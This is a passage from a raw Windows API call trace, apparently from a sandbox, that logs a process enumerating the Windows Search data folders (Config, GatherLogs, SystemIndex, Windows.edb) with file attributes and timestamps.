nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.677] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.677] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.677] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.678] CoTaskMemFree (pv=0x4e1c10) [0138.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.678] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications", lpFilePart=0x0) returned 0x31 [0138.679] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.679] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0138.680] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0138.680] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.680] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.681] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0138.681] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.681] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.682] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.682] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.682] CoTaskMemFree (pv=0x4e1c10) [0138.682] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows", lpFilePart=0x0) returned 0x39 [0138.684] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.684] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config", cAlternateFileName="")) returned 1 [0138.684] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GatherLogs", cAlternateFileName="GATHER~1")) returned 1 [0138.685] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29612a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSS.chk", cAlternateFileName="")) returned 1 [0138.685] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x295a0600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x295a0600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSS.log", cAlternateFileName="")) returned 1 [0138.685] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x295c6760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x295c6760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x295ec8c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSSres00001.jrs", cAlternateFileName="MSSRES~1.JRS")) returned 1 [0138.686] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x295ec8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x295ec8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x295ec8c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSSres00002.jrs", cAlternateFileName="MSSRES~2.JRS")) returned 1 [0138.686] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27eb7240, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Projects", cAlternateFileName="")) returned 1 [0138.687] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29612a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4810000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows.edb", cAlternateFileName="")) returned 1 [0138.687] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.687] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.689] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.689] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config", cAlternateFileName="")) returned 1 [0138.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GatherLogs", cAlternateFileName="GATHER~1")) returned 1 [0138.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29612a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSS.chk", cAlternateFileName="")) returned 1 [0138.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x295a0600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x295a0600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSS.log", cAlternateFileName="")) returned 1 [0138.691] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x295c6760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x295c6760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x295ec8c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSSres00001.jrs", cAlternateFileName="MSSRES~1.JRS")) returned 1 [0138.691] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x295ec8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x295ec8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x295ec8c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSSres00002.jrs", cAlternateFileName="MSSRES~2.JRS")) returned 1 [0138.691] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27eb7240, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Projects", cAlternateFileName="")) returned 1 [0138.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29612a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4810000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows.edb", cAlternateFileName="")) returned 1 [0138.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29612a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4810000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows.edb", cAlternateFileName="")) returned 0 [0138.692] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.693] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.693] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.693] CoTaskMemFree (pv=0x4e1c10) [0138.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.694] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Config", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Config", lpFilePart=0x0) returned 0x40 [0138.695] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.695] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.695] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.696] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.696] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.696] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.697] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.697] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.697] CoTaskMemFree (pv=0x4e1c10) [0138.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.697] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs", lpFilePart=0x0) returned 0x44 [0138.698] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 1 [0138.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 0 [0138.699] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 1 [0138.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.701] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.701] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.701] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.701] CoTaskMemFree (pv=0x4e1c10) [0138.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.701] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex", lpFilePart=0x0) returned 0x50 [0138.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.Crwl", cAlternateFileName="SYSTEM~1.CRW")) returned 1 [0138.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.gthr", cAlternateFileName="SYSTEM~1.GTH")) returned 1 [0138.704] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, 